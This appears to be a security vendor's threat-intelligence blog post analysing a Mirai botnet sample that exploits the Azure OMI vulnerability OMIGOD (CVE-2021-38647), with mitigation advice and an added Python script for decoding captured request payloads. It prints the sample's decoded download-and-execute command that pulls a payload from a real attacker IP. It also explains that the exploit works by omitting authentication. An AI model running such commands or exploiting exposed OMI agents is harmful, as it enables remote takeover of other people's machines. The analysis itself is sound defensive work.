Azure OMI Vulnerability OMIGOD (CVE-2021-38647) Now Under Exploitation

Azure users running Linux virtual machines are at risk of compromise unless they upgrade now. A vulnerability in the management agent of the Open Management Infrastructure (OMI) framework can be exploited remotely, allowing attackers to escalate to root privileges and execute malicious code on the host.

Azure automatically installs the OMI agent when users set up a Linux VM and enable monitoring or certain other services. By default, OMI runs with root access – making the system extremely vulnerable and subject to compromise. It typically listens on ports 5986, 5985 and 1270; however, any port can be used.

Incredibly, OMIGOD, discovered by researchers at Wiz, is exploited simply by omitting authentication from requests, which OMI then processes with the root privileges it runs under.

Below, our team analyses a real-world attack we have observed exploiting OMIGOD.


Mirai Botnet – Quick off the Mark

There is always a race among botnets to see who can compromise hosts first. Greynoise has reported on a number of systems that are either scanning for, or actively exploiting, OMIGOD.

One botnet operator is definitely attempting it though, and credit to Germán Fernández for picking this one up:

Malware Analysis

Below we have analysed an x86 Mirai sample from http://212.192.241[.]72/bins/dark.x86

The worm tries to spread to other systems through a number of vulnerabilities, including OMIGOD.

We can see the exploit code for OMIGOD after decompiling the sample with Retdec:

The parameter <p:command> contains the following command, encoded with base64:

wget http://212.192.241[.]72/; curl -O http://212.192.241[.]72/; chmod 777; sh

Which is subsequently used to install the Mirai botnet via the URL:

  • http://212.192.241[.]72/
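As an added illustration (not code from the post, nor from the analysed sample), the following Python decodes a base64-encoded `<p:command>` payload of the kind described above and pulls out the download URLs and the tools the command invokes, which is what an analyst wants first when triaging a captured request. The wrapping envelope element names and namespaces in the sample request are placeholders I constructed; only the `<p:command>` element and the decoded command line come from the post (IP kept defanged as on the page).

```python
import base64
import re
from typing import Optional

# Command line the post reports finding base64-encoded inside <p:command>
# (IP defanged exactly as on the page).
DECODED_COMMAND = (
    "wget http://212.192.241[.]72/; curl -O http://212.192.241[.]72/; chmod 777; sh"
)

# Constructed sample request body for illustration only: the envelope element
# names and namespace URIs are placeholders, not the structure used by the sample.
ENCODED_COMMAND = base64.b64encode(DECODED_COMMAND.encode()).decode()
SAMPLE_REQUEST = (
    '<s:Envelope xmlns:s="urn:example:soap" xmlns:p="urn:example:omi">'
    "<s:Body><p:Request>"
    f"<p:command>{ENCODED_COMMAND}</p:command>"
    "</p:Request></s:Body></s:Envelope>"
)

COMMAND_RE = re.compile(r"<p:command>\s*(.*?)\s*</p:command>", re.S)
URL_RE = re.compile(r"https?://[^\s;'\"|&]+")


def decode_command(body: str) -> Optional[str]:
    """Return the decoded <p:command> string, or None if it is absent or undecodable."""
    match = COMMAND_RE.search(body)
    if not match:
        return None
    try:
        # validate=True rejects non-base64 characters instead of silently skipping them
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def extract_urls(command: str) -> list:
    """Unique download URLs in order of first appearance (defanged form preserved)."""
    return list(dict.fromkeys(URL_RE.findall(command)))


def invoked_tools(command: str) -> list:
    """First word of each shell statement: the downloaders and interpreter used."""
    tools = []
    for statement in re.split(r"[;&|]+", command):
        words = statement.split()
        if words:
            tools.append(words[0])
    return tools


def triage(body: str) -> dict:
    """Summarise a captured request body for IoC extraction."""
    command = decode_command(body)
    if command is None:
        return {"command": None, "urls": [], "tools": []}
    return {
        "command": command,
        "urls": extract_urls(command),
        "tools": invoked_tools(command),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_REQUEST))
```

Feeding a captured body through `triage` yields the decoded command, a de-duplicated list of URLs to block or hunt for, and the sequence `wget`, `curl`, `chmod`, `sh`, which is the pattern to look for in shell or process telemetry from hosts that were exposed on the OMI ports.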

The file is a fairly standard Mirai installer that:

  • Attempts to install across multiple possible Architectures
  • Hides itself as the legitimate web server “nginx”
  • Then closes the ports of the vulnerabilities it exploited to stop other botnets taking over the system:


Ensure Microsoft Azure Firewall is configured to block any external access to the OMI ports (5986, 5985 and 1270 by default).

You can check whether the OMI agent is present on your Linux systems:

$ sudo dpkg -l omi
dpkg-query: no packages found matching omi

If it is present, ensure it is running the latest version. Microsoft is not automatically updating insecure agents, and even systems deployed after the vulnerability was published may still be vulnerable. Microsoft has provided customer guidance in a post titled “Open Management Infrastructure Remote Code Execution Vulnerability”.

Cado Response

If you’d like to investigate potentially compromised machines, the full unlimited version of the Cado Response platform is now available for Azure via a free trial. The Cado Response platform does not run the OMI agent.

Indicators of Compromise
About Cado Security

Cado Security is the cloud investigation and response automation company. The Cado platform leverages the scale, speed and automation of the cloud to effortlessly deliver forensic-level detail into cloud, container and serverless environments. Only Cado empowers security teams to investigate and respond at cloud speed.